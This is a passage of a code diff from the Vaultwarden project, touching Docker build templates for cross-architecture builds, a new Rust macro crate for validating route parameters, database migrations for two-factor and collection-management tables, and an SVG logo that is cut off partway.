# hadolint ignore=DL3006
|
||||||
FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].image }} as build
|
FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].image }} AS build
|
||||||
{% if base == "debian" %}
|
{% if base == "debian" %}
|
||||||
COPY --from=xx / /
|
COPY --from=xx / /
|
||||||
{% endif %}
|
{% endif %}
|
||||||
@@ -82,10 +83,7 @@ RUN apt-get update && \
|
|||||||
"libc6-$(xx-info debian-arch)-cross" \
|
"libc6-$(xx-info debian-arch)-cross" \
|
||||||
"libc6-dev-$(xx-info debian-arch)-cross" \
|
"libc6-dev-$(xx-info debian-arch)-cross" \
|
||||||
"linux-libc-dev-$(xx-info debian-arch)-cross" && \
|
"linux-libc-dev-$(xx-info debian-arch)-cross" && \
|
||||||
# Run xx-cargo early, since it sometimes seems to break when run at a later stage
|
xx-apt-get install -y \
|
||||||
echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
|
|
||||||
|
|
||||||
RUN xx-apt-get install -y \
|
|
||||||
--no-install-recommends \
|
--no-install-recommends \
|
||||||
gcc \
|
gcc \
|
||||||
libmariadb3 \
|
libmariadb3 \
|
||||||
@@ -96,57 +94,66 @@ RUN xx-apt-get install -y \
|
|||||||
# Force install arch dependend mariadb dev packages
|
# Force install arch dependend mariadb dev packages
|
||||||
# Installing them the normal way breaks several other packages (again)
|
# Installing them the normal way breaks several other packages (again)
|
||||||
apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
|
apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
|
||||||
dpkg --force-all -i ./libmariadb-dev*.deb
|
dpkg --force-all -i ./libmariadb-dev*.deb && \
|
||||||
|
# Run xx-cargo early, since it sometimes seems to break when run at a later stage
|
||||||
|
echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
|
||||||
{% endif %}
|
{% endif %}
|
||||||
|
|
||||||
# Create CARGO_HOME folder and don't download rust docs
|
# Create CARGO_HOME folder and don't download rust docs
|
||||||
RUN mkdir -pv "${CARGO_HOME}" \
|
RUN mkdir -pv "${CARGO_HOME}" && \
|
||||||
&& rustup set profile minimal
|
rustup set profile minimal
|
||||||
|
|
||||||
# Creates a dummy project used to grab dependencies
|
# Creates a dummy project used to grab dependencies
|
||||||
RUN USER=root cargo new --bin /app
|
RUN USER=root cargo new --bin /app
|
||||||
WORKDIR /app
|
WORKDIR /app
|
||||||
|
|
||||||
{% if base == "debian" %}
|
{% if base == "debian" %}
|
||||||
# Environment variables for cargo across Debian and Alpine
|
# Environment variables for Cargo on Debian based builds
|
||||||
|
ARG TARGET_PKG_CONFIG_PATH
|
||||||
|
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
if xx-info is-cross ; then \
|
if xx-info is-cross ; then \
|
||||||
# We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
|
# We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
|
||||||
# Because of this we generate the needed environment variables here which we can load in the needed steps.
|
# Because of this we generate the needed environment variables here which we can load in the needed steps.
|
||||||
echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
||||||
echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
||||||
echo "export PKG_CONFIG=/usr/bin/$(xx-info)-pkg-config" >> /env-cargo && \
|
|
||||||
echo "export CROSS_COMPILE=1" >> /env-cargo && \
|
echo "export CROSS_COMPILE=1" >> /env-cargo && \
|
||||||
echo "export OPENSSL_INCLUDE_DIR=/usr/include/$(xx-info)" >> /env-cargo && \
|
echo "export PKG_CONFIG_ALLOW_CROSS=1" >> /env-cargo && \
|
||||||
echo "export OPENSSL_LIB_DIR=/usr/lib/$(xx-info)" >> /env-cargo ; \
|
# For some architectures `xx-info` returns a triple which doesn't matches the path on disk
|
||||||
|
# In those cases you can override this by setting the `TARGET_PKG_CONFIG_PATH` build-arg
|
||||||
|
if [[ -n "${TARGET_PKG_CONFIG_PATH}" ]]; then \
|
||||||
|
echo "export TARGET_PKG_CONFIG_PATH=${TARGET_PKG_CONFIG_PATH}" >> /env-cargo ; \
|
||||||
|
else \
|
||||||
|
echo "export PKG_CONFIG_PATH=/usr/lib/$(xx-info)/pkgconfig" >> /env-cargo ; \
|
||||||
|
fi && \
|
||||||
|
echo "# End of env-cargo" >> /env-cargo ; \
|
||||||
fi && \
|
fi && \
|
||||||
# Output the current contents of the file
|
# Output the current contents of the file
|
||||||
cat /env-cargo
|
cat /env-cargo
|
||||||
|
|
||||||
# Configure the DB ARG as late as possible to not invalidate the cached layers above
|
|
||||||
ARG DB=sqlite,mysql,postgresql
|
|
||||||
{% elif base == "alpine" %}
|
{% elif base == "alpine" %}
|
||||||
# Shared variables across Debian and Alpine
|
# Environment variables for Cargo on Alpine based builds
|
||||||
RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
|
RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
|
||||||
# To be able to build the armv6 image with mimalloc we need to tell the linker to also look for libatomic
|
|
||||||
if [[ "${TARGETARCH}${TARGETVARIANT}" == "armv6" ]] ; then echo "export RUSTFLAGS='-Clink-arg=-latomic'" >> /env-cargo ; fi && \
|
|
||||||
# Output the current contents of the file
|
# Output the current contents of the file
|
||||||
cat /env-cargo
|
cat /env-cargo
|
||||||
|
|
||||||
# Enable MiMalloc to improve performance on Alpine builds
|
|
||||||
ARG DB=sqlite,mysql,postgresql,enable_mimalloc
|
|
||||||
{% endif %}
|
{% endif %}
|
||||||
|
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
rustup target add "${CARGO_TARGET}"
|
rustup target add "${CARGO_TARGET}"
|
||||||
|
|
||||||
ARG CARGO_PROFILE=release
|
|
||||||
ARG VW_VERSION
|
|
||||||
|
|
||||||
# Copies over *only* your manifests and build files
|
# Copies over *only* your manifests and build files
|
||||||
COPY ./Cargo.* ./
|
COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
|
||||||
COPY ./rust-toolchain.toml ./rust-toolchain.toml
|
COPY ./macros ./macros
|
||||||
COPY ./build.rs ./build.rs
|
|
||||||
|
ARG CARGO_PROFILE=release
|
||||||
|
|
||||||
|
# Configure the DB ARG as late as possible to not invalidate the cached layers above
|
||||||
|
{% if base == "debian" %}
|
||||||
|
ARG DB=sqlite,mysql,postgresql
|
||||||
|
{% elif base == "alpine" %}
|
||||||
|
# Enable MiMalloc to improve performance on Alpine builds
|
||||||
|
ARG DB=sqlite,mysql,postgresql,enable_mimalloc
|
||||||
|
{% endif %}
|
||||||
|
|
||||||
# Builds your dependencies and removes the
|
# Builds your dependencies and removes the
|
||||||
# dummy project, except the target folder
|
# dummy project, except the target folder
|
||||||
@@ -159,6 +166,8 @@ RUN source /env-cargo && \
|
|||||||
# To avoid copying unneeded files, use .dockerignore
|
# To avoid copying unneeded files, use .dockerignore
|
||||||
COPY . .
|
COPY . .
|
||||||
|
|
||||||
|
ARG VW_VERSION
|
||||||
|
|
||||||
# Builds again, this time it will be the actual source files being build
|
# Builds again, this time it will be the actual source files being build
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
||||||
@@ -222,14 +231,12 @@ RUN mkdir /data && \
|
|||||||
|
|
||||||
VOLUME /data
|
VOLUME /data
|
||||||
EXPOSE 80
|
EXPOSE 80
|
||||||
EXPOSE 3012
|
|
||||||
|
|
||||||
# Copies the files from the context (Rocket.toml file and web-vault)
|
# Copies the files from the context (Rocket.toml file and web-vault)
|
||||||
# and the binary from the "build" stage to the current stage
|
# and the binary from the "build" stage to the current stage
|
||||||
WORKDIR /
|
WORKDIR /
|
||||||
|
|
||||||
COPY docker/healthcheck.sh /healthcheck.sh
|
COPY docker/healthcheck.sh docker/start.sh /
|
||||||
COPY docker/start.sh /start.sh
|
|
||||||
|
|
||||||
COPY --from=vault /web-vault ./web-vault
|
COPY --from=vault /web-vault ./web-vault
|
||||||
COPY --from=build /app/target/final/vaultwarden .
|
COPY --from=build /app/target/final/vaultwarden .
|
||||||
|
|||||||
@@ -11,6 +11,11 @@ With just these two files we can build both Debian and Alpine images for the fol
|
|||||||
- armv7 (linux/arm/v7)
|
- armv7 (linux/arm/v7)
|
||||||
- armv6 (linux/arm/v6)
|
- armv6 (linux/arm/v6)
|
||||||
|
|
||||||
|
Some unsupported platforms for Debian based images. These are not built and tested by default and are only provided to make it easier for users to build for these architectures.
|
||||||
|
- 386 (linux/386)
|
||||||
|
- ppc64le (linux/ppc64le)
|
||||||
|
- s390x (linux/s390x)
|
||||||
|
|
||||||
To build these containers you need to enable QEMU binfmt support to be able to run/emulate architectures which are different then your host.<br>
|
To build these containers you need to enable QEMU binfmt support to be able to run/emulate architectures which are different then your host.<br>
|
||||||
This ensures the container build process can run binaries from other architectures.<br>
|
This ensures the container build process can run binaries from other architectures.<br>
|
||||||
|
|
||||||
@@ -41,7 +46,7 @@ There also is an option to use an other docker container to provide support for
|
|||||||
```bash
|
```bash
|
||||||
# To install and activate
|
# To install and activate
|
||||||
docker run --privileged --rm tonistiigi/binfmt --install arm64,arm
|
docker run --privileged --rm tonistiigi/binfmt --install arm64,arm
|
||||||
# To unistall
|
# To uninstall
|
||||||
docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
|
docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|||||||
@@ -17,7 +17,7 @@ variable "SOURCE_REPOSITORY_URL" {
|
|||||||
default = null
|
default = null
|
||||||
}
|
}
|
||||||
|
|
||||||
// The commit hash of of the current commit this build was triggered on
|
// The commit hash of the current commit this build was triggered on
|
||||||
variable "SOURCE_COMMIT" {
|
variable "SOURCE_COMMIT" {
|
||||||
default = null
|
default = null
|
||||||
}
|
}
|
||||||
@@ -125,6 +125,31 @@ target "debian-armv6" {
|
|||||||
tags = generate_tags("", "-armv6")
|
tags = generate_tags("", "-armv6")
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ==== Start of unsupported Debian architecture targets ===
|
||||||
|
// These are provided just to help users build for these rare platforms
|
||||||
|
// They will not be built by default
|
||||||
|
target "debian-386" {
|
||||||
|
inherits = ["debian"]
|
||||||
|
platforms = ["linux/386"]
|
||||||
|
tags = generate_tags("", "-386")
|
||||||
|
args = {
|
||||||
|
TARGET_PKG_CONFIG_PATH = "/usr/lib/i386-linux-gnu/pkgconfig"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
target "debian-ppc64le" {
|
||||||
|
inherits = ["debian"]
|
||||||
|
platforms = ["linux/ppc64le"]
|
||||||
|
tags = generate_tags("", "-ppc64le")
|
||||||
|
}
|
||||||
|
|
||||||
|
target "debian-s390x" {
|
||||||
|
inherits = ["debian"]
|
||||||
|
platforms = ["linux/s390x"]
|
||||||
|
tags = generate_tags("", "-s390x")
|
||||||
|
}
|
||||||
|
// ==== End of unsupported Debian architecture targets ===
|
||||||
|
|
||||||
// A Group to build all platforms individually for local testing
|
// A Group to build all platforms individually for local testing
|
||||||
group "debian-all" {
|
group "debian-all" {
|
||||||
targets = ["debian-amd64", "debian-arm64", "debian-armv7", "debian-armv6"]
|
targets = ["debian-amd64", "debian-arm64", "debian-armv7", "debian-armv6"]
|
||||||
|
|||||||
@@ -1,5 +1,9 @@
|
|||||||
#!/bin/sh
|
#!/bin/sh
|
||||||
|
|
||||||
|
if [ -n "${UMASK}" ]; then
|
||||||
|
umask "${UMASK}"
|
||||||
|
fi
|
||||||
|
|
||||||
if [ -r /etc/vaultwarden.sh ]; then
|
if [ -r /etc/vaultwarden.sh ]; then
|
||||||
. /etc/vaultwarden.sh
|
. /etc/vaultwarden.sh
|
||||||
elif [ -r /etc/bitwarden_rs.sh ]; then
|
elif [ -r /etc/bitwarden_rs.sh ]; then
|
||||||
|
|||||||
16
macros/Cargo.toml
Normal file
16
macros/Cargo.toml
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
[package]
|
||||||
|
name = "macros"
|
||||||
|
version = "0.1.0"
|
||||||
|
edition = "2021"
|
||||||
|
|
||||||
|
[lib]
|
||||||
|
name = "macros"
|
||||||
|
path = "src/lib.rs"
|
||||||
|
proc-macro = true
|
||||||
|
|
||||||
|
[dependencies]
|
||||||
|
quote = "1.0.40"
|
||||||
|
syn = "2.0.104"
|
||||||
|
|
||||||
|
[lints]
|
||||||
|
workspace = true
|
||||||
56
macros/src/lib.rs
Normal file
56
macros/src/lib.rs
Normal file
@@ -0,0 +1,56 @@
|
|||||||
|
use proc_macro::TokenStream;
|
||||||
|
use quote::quote;
|
||||||
|
|
||||||
|
#[proc_macro_derive(UuidFromParam)]
|
||||||
|
pub fn derive_uuid_from_param(input: TokenStream) -> TokenStream {
|
||||||
|
let ast = syn::parse(input).unwrap();
|
||||||
|
|
||||||
|
impl_derive_uuid_macro(&ast)
|
||||||
|
}
|
||||||
|
|
||||||
|
fn impl_derive_uuid_macro(ast: &syn::DeriveInput) -> TokenStream {
|
||||||
|
let name = &ast.ident;
|
||||||
|
let gen_derive = quote! {
|
||||||
|
#[automatically_derived]
|
||||||
|
impl<'r> rocket::request::FromParam<'r> for #name {
|
||||||
|
type Error = ();
|
||||||
|
|
||||||
|
#[inline(always)]
|
||||||
|
fn from_param(param: &'r str) -> Result<Self, Self::Error> {
|
||||||
|
if uuid::Uuid::parse_str(param).is_ok() {
|
||||||
|
Ok(Self(param.to_string()))
|
||||||
|
} else {
|
||||||
|
Err(())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
|
gen_derive.into()
|
||||||
|
}
|
||||||
|
|
||||||
|
#[proc_macro_derive(IdFromParam)]
|
||||||
|
pub fn derive_id_from_param(input: TokenStream) -> TokenStream {
|
||||||
|
let ast = syn::parse(input).unwrap();
|
||||||
|
|
||||||
|
impl_derive_safestring_macro(&ast)
|
||||||
|
}
|
||||||
|
|
||||||
|
fn impl_derive_safestring_macro(ast: &syn::DeriveInput) -> TokenStream {
|
||||||
|
let name = &ast.ident;
|
||||||
|
let gen_derive = quote! {
|
||||||
|
#[automatically_derived]
|
||||||
|
impl<'r> rocket::request::FromParam<'r> for #name {
|
||||||
|
type Error = ();
|
||||||
|
|
||||||
|
#[inline(always)]
|
||||||
|
fn from_param(param: &'r str) -> Result<Self, Self::Error> {
|
||||||
|
if param.chars().all(|c| matches!(c, 'a'..='z' | 'A'..='Z' |'0'..='9' | '-')) {
|
||||||
|
Ok(Self(param.to_string()))
|
||||||
|
} else {
|
||||||
|
Err(())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
|
gen_derive.into()
|
||||||
|
}
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE twofactor MODIFY last_used BIGINT NOT NULL;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
DROP TABLE twofactor_duo_ctx;
|
||||||
@@ -0,0 +1,8 @@
|
|||||||
|
CREATE TABLE twofactor_duo_ctx (
|
||||||
|
state VARCHAR(64) NOT NULL,
|
||||||
|
user_email VARCHAR(255) NOT NULL,
|
||||||
|
nonce VARCHAR(64) NOT NULL,
|
||||||
|
exp BIGINT NOT NULL,
|
||||||
|
|
||||||
|
PRIMARY KEY (state)
|
||||||
|
);
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE `twofactor_incomplete` DROP COLUMN `device_type`;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser
|
||||||
5
migrations/mysql/2025-01-09-172300_add_manage/up.sql
Normal file
5
migrations/mysql/2025-01-09-172300_add_manage/up.sql
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
ALTER TABLE users_collections
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
|
||||||
|
|
||||||
|
ALTER TABLE collections_groups
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
|
||||||
@@ -0,0 +1,3 @@
|
|||||||
|
ALTER TABLE twofactor
|
||||||
|
ALTER COLUMN last_used TYPE BIGINT,
|
||||||
|
ALTER COLUMN last_used SET NOT NULL;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
DROP TABLE twofactor_duo_ctx;
|
||||||
@@ -0,0 +1,8 @@
|
|||||||
|
CREATE TABLE twofactor_duo_ctx (
|
||||||
|
state VARCHAR(64) NOT NULL,
|
||||||
|
user_email VARCHAR(255) NOT NULL,
|
||||||
|
nonce VARCHAR(64) NOT NULL,
|
||||||
|
exp BIGINT NOT NULL,
|
||||||
|
|
||||||
|
PRIMARY KEY (state)
|
||||||
|
);
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE twofactor_incomplete DROP COLUMN device_type;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
ALTER TABLE users_collections
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
|
||||||
|
|
||||||
|
ALTER TABLE collections_groups
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT FALSE;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
-- Integer size in SQLite is already i64, so we don't need to do anything
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
DROP TABLE twofactor_duo_ctx;
|
||||||
@@ -0,0 +1,8 @@
|
|||||||
|
CREATE TABLE twofactor_duo_ctx (
|
||||||
|
state TEXT NOT NULL,
|
||||||
|
user_email TEXT NOT NULL,
|
||||||
|
nonce TEXT NOT NULL,
|
||||||
|
exp INTEGER NOT NULL,
|
||||||
|
|
||||||
|
PRIMARY KEY (state)
|
||||||
|
);
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE `twofactor_incomplete` DROP COLUMN `device_type`;
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE twofactor_incomplete ADD COLUMN device_type INTEGER NOT NULL DEFAULT 14; -- 14 = Unknown Browser
|
||||||
5
migrations/sqlite/2025-01-09-172300_add_manage/up.sql
Normal file
5
migrations/sqlite/2025-01-09-172300_add_manage/up.sql
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
ALTER TABLE users_collections
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT 0; -- FALSE
|
||||||
|
|
||||||
|
ALTER TABLE collections_groups
|
||||||
|
ADD COLUMN manage BOOLEAN NOT NULL DEFAULT 0; -- FALSE
|
||||||
78
resources/vaultwarden-logo-auto.svg
Normal file
78
resources/vaultwarden-logo-auto.svg
Normal file
@@ -0,0 +1,78 @@
|
|||||||
|
<svg width="1365.8256" height="280.48944" version="1.1" viewBox="0 0 1365.8255 280.48944" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<style>
|
||||||
|
@media (prefers-color-scheme: dark) {
|
||||||
|
svg { -webkit-filter:invert(0.90); filter:invert(0.90); }
|
||||||
|
}</style>
|
||||||
|
<title>Vaultwarden Logo</title>
|
||||||
|
<defs>
|
||||||
|
<mask id="d">
|
||||||
|
<rect x="-60" y="-60" width="120" height="120" fill="#fff"/>
|
||||||
|
<circle id="b" cy="-40" r="3"/>
|
||||||
|
<use transform="rotate(72)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(144)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(216)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(-72)" xlink:href="#b"/>
|
||||||
|
</mask>
|
||||||
|
</defs>
|
||||||
|
<g transform="translate(-10.708266,-9.2965379)" aria-label="aultwarden">
|
||||||
|
<path d="m371.55338 223.43649-5.76172-14.84375h-0.78125q-7.51953 9.47266-15.52735 13.1836-7.91015 3.61328-20.70312 3.61328-15.72266 0-24.80469-8.98438-8.98437-8.98437-8.98437-25.58593 0-17.38282 12.10937-25.58594 12.20703-8.30078 36.71875-9.17969l18.94531-0.58594v-4.78515q0-16.60157-16.99218-16.60157-13.08594 0-30.76172 7.91016l-9.86328-20.11719q18.84765-9.86328 41.79687-9.86328 21.97266 0 33.69141 9.57031 11.71875 9.57032 11.71875 29.10157v72.7539zm-8.78907-50.58593-11.52343 0.39062q-12.98829 0.39063-19.33594 4.6875-6.34766 4.29688-6.34766 13.08594 0 12.59765 14.45313 12.59765 10.35156 0 16.5039-5.95703 6.25-5.95703 6.25-15.82031zm137.59766 50.58593-4.00391-13.96484h-1.5625q-4.78515 7.61719-13.57422 11.81641-8.78906 4.10156-20.01953 4.10156-19.23828 0-29.0039-10.25391-9.76563-10.35156-9.76563-29.6875v-71.1914h29.78516v63.76953q0 11.8164 4.19922 17.77343 4.19922 5.85938 13.3789 5.85938 12.5 0 18.06641-8.30078 5.56641-8.39844 5.56641-27.73438v-51.36718h29.78515v109.17968zm83.88672 0h-29.78516v-151.953122h29.78516zm77.24609-21.77734q7.8125 0 18.75-3.41797v22.16797q-11.13281 4.98047-27.34375 4.98047-17.87109 0-26.07422-8.98438-8.10547-9.08203-8.10547-27.14843v-52.63672h-14.25781v-12.59766l16.40625-9.96094 8.59375-23.046872h19.04297v23.242192h30.56641v22.36328h-30.56641v52.63672q0 6.34765 3.51563 9.375 3.61328 3.02734 9.47265 3.02734z"/>
|
||||||
|
<path d="m791.27994 223.43649-19.62891-62.79297q-1.85547-5.76171-6.93359-26.17187h-0.78125q-3.90625 17.08984-6.83594 26.36719l-20.21484 62.59765h-18.75l-29.19922-107.03125h16.99219q10.35156 40.33203 15.72265 61.42578 5.46875 21.09375 6.25 28.41797h0.78125q1.07422-5.5664 3.41797-14.35547 2.44141-8.88671 4.19922-14.0625l19.62891-61.42578h17.57812l19.14063 61.42578q5.46875 16.79688 7.42187 28.22266h0.78125q0.39063-3.51562 2.05078-10.83984 1.75781-7.32422 20.41016-78.8086h16.79687l-29.58984 107.03125zm133.98437 0-3.22265-15.23437h-0.78125q-8.00782 10.05859-16.01563 13.67187-7.91015 3.51563-19.82422 3.51563-15.91797 0-25-8.20313-8.98437-8.20312-8.98437-23.33984 0-32.42188 51.85547-33.98438l18.16406-0.58593v-6.64063q0-12.59765-5.46875-18.55469-5.37109-6.05468-17.28516-6.05468-13.3789 0-30.27343 8.20312l-4.98047-12.40234q7.91015-4.29688 17.28515-6.73828 9.47266-2.44141 18.94532-2.44141 19.14062 0 28.32031 8.49609 9.27734 8.4961 9.27734 27.2461v73.04687zm-36.62109-11.42578q15.13672 0 23.73047-8.30078 8.6914-8.30078 8.6914-23.24219v-9.66797l-16.21093 0.6836q-19.33594 0.68359-27.92969 6.05469-8.49609 5.27343-8.49609 16.5039 0 8.78906 5.27343 13.37891 5.3711 4.58984 14.94141 4.58984zm130.85938-97.55859q7.1289 0 12.793 1.17187l-2.2461 15.03907q-6.6407-1.46485-11.7188-1.46485-12.9883 0-22.26561 10.54688-9.17968 10.54687-9.17968 26.26953v57.42187h-16.21094v-107.03125h13.37891l1.85546 19.82422h0.78125q5.95704-10.44922 14.35551-16.11328 8.3984-5.66406 18.457-5.66406zm101.6602 94.6289h-0.879q-11.2304 16.3086-33.5937 16.3086-20.9961 0-32.7148-14.35547-11.6211-14.35547-11.6211-40.82031 0-26.46485 11.7187-41.11328 11.7188-14.64844 32.6172-14.64844 21.7773 0 33.3984 15.82031h1.2696l-0.6836-7.71484-0.3907-7.51953v-43.554692h16.211v151.953122h-13.1836zm-32.4219 2.73438q16.6015 0 24.0234-8.98438 7.5195-9.08203 7.5195-29.19921v-3.41797q0-22.75391-7.6171-32.42188-7.5196-9.76562-24.1211-9.76562-14.2578 0-21.875 11.13281-7.5196 11.03516-7.5196 31.25 0 20.50781 7.5196 30.95703 7.5195 10.44922 22.0703 10.44922zm127.3437 13.57422q-23.7304 0-37.5-14.45313-13.6718-14.45312-13.6718-40.13672 0-25.8789 12.6953-41.11328 12.7929-15.23437 34.2773-15.23437 20.1172 0 31.8359 13.28125 11.7188 13.18359 11.7188 34.86328v10.25391h-73.7305q0.4883 18.84765 9.4727 28.61328 9.082 9.76562 25.4883 9.76562 17.2851 0 34.1797-7.22656v14.45312q-8.5938 3.71094-16.3086 5.27344-7.6172 1.66016-18.4571 1.66016zm-4.3945-97.36328q-12.8906 0-20.6055 8.39843-7.6172 8.39844-8.9843 23.24219h55.957q0-15.33203-6.836-23.4375-6.8359-8.20312-19.5312-8.20312zm144.6289 95.41015v-69.23828q0-13.08594-5.957-19.53125-5.9571-6.44531-18.6524-6.44531-16.7968 0-24.6093 9.08203t-7.8125 29.98047v56.15234h-16.211v-107.03125h13.1836l2.6367 14.64844h0.7813q4.9804-7.91016 13.9648-12.20703 8.9844-4.39453 20.0196-4.39453 19.3359 0 29.1015 9.375 9.7656 9.27734 9.7656 29.78515v69.82422z"/>
|
||||||
|
</g>
|
||||||
|
<g transform="translate(-10.708266,-9.2965379)">
|
||||||
|
<g id="e" transform="matrix(2.6712834,0,0,2.6712834,150.95027,149.53854)">
|
||||||
|
<g id="f" mask="url(#d)">
|
||||||
|
<path d="m-31.1718-33.813208 26.496029 74.188883h9.3515399l26.49603-74.188883h-9.767164l-16.728866 47.588948q-1.662496 4.571864-2.805462 8.624198-1.142966 3.948427-1.870308 7.585137-.72734199-3.63671-1.8703079-7.689043-1.142966-4.052334-2.805462-8.728104l-16.624959-47.381136z" stroke="#000" stroke-width="4.51171"/>
|
||||||
|
<circle transform="scale(-1,1)" r="43" fill="none" stroke="#000" stroke-width="9"/>
|
||||||
|
<g id="g" transform="scale(-1,1)">
|
||||||
|
<polygon id="a" points="46 -3 46 3 51 0" stroke="#000" stroke-linejoin="round" stroke-width="3"/>
|
||||||
|
<use transform="rotate(11.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(22.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(33.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(45)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(56.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(67.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(78.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(90)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(101.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(112.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(123.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(135)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(146.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(157.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(168.75)" xlink:href="#a"/>
|
||||||
|
<use transform="scale(-1)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(191.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(202.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(213.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(225)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(236.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(247.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(258.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-90)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-78.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-67.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-56.25)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-45)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-33.75)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-22.5)" xlink:href="#a"/>
|
||||||
|
<use transform="rotate(-11.25)" xlink:href="#a"/>
|
||||||
|
</g>
|
||||||
|
<g id="h" transform="scale(-1,1)">
|
||||||
|
<polygon id="c" points="7 -42 -7 -42 0 -35" stroke="#000" stroke-linejoin="round" stroke-width="6"/>
|
||||||
|
<use transform="rotate(72)" xlink:href="#c"/>
|
||||||
|
<use transform="rotate(144)" xlink:href="#c"/>
|
||||||
|
<use transform="rotate(216)" xlink:href="#c"/>
|
||||||
|
<use transform="rotate(-72)" xlink:href="#c"/>
|
||||||
|
</g>
|
||||||
|
</g>
|
||||||
|
<mask>
|
||||||
|
<rect x="-60" y="-60" width="120" height="120" fill="#fff"/>
|
||||||
|
<circle cy="-40" r="3"/>
|
||||||
|
<use transform="rotate(72)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(144)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(216)" xlink:href="#b"/>
|
||||||
|
<use transform="rotate(-72)" xlink:href="#b"/>
|
||||||
|
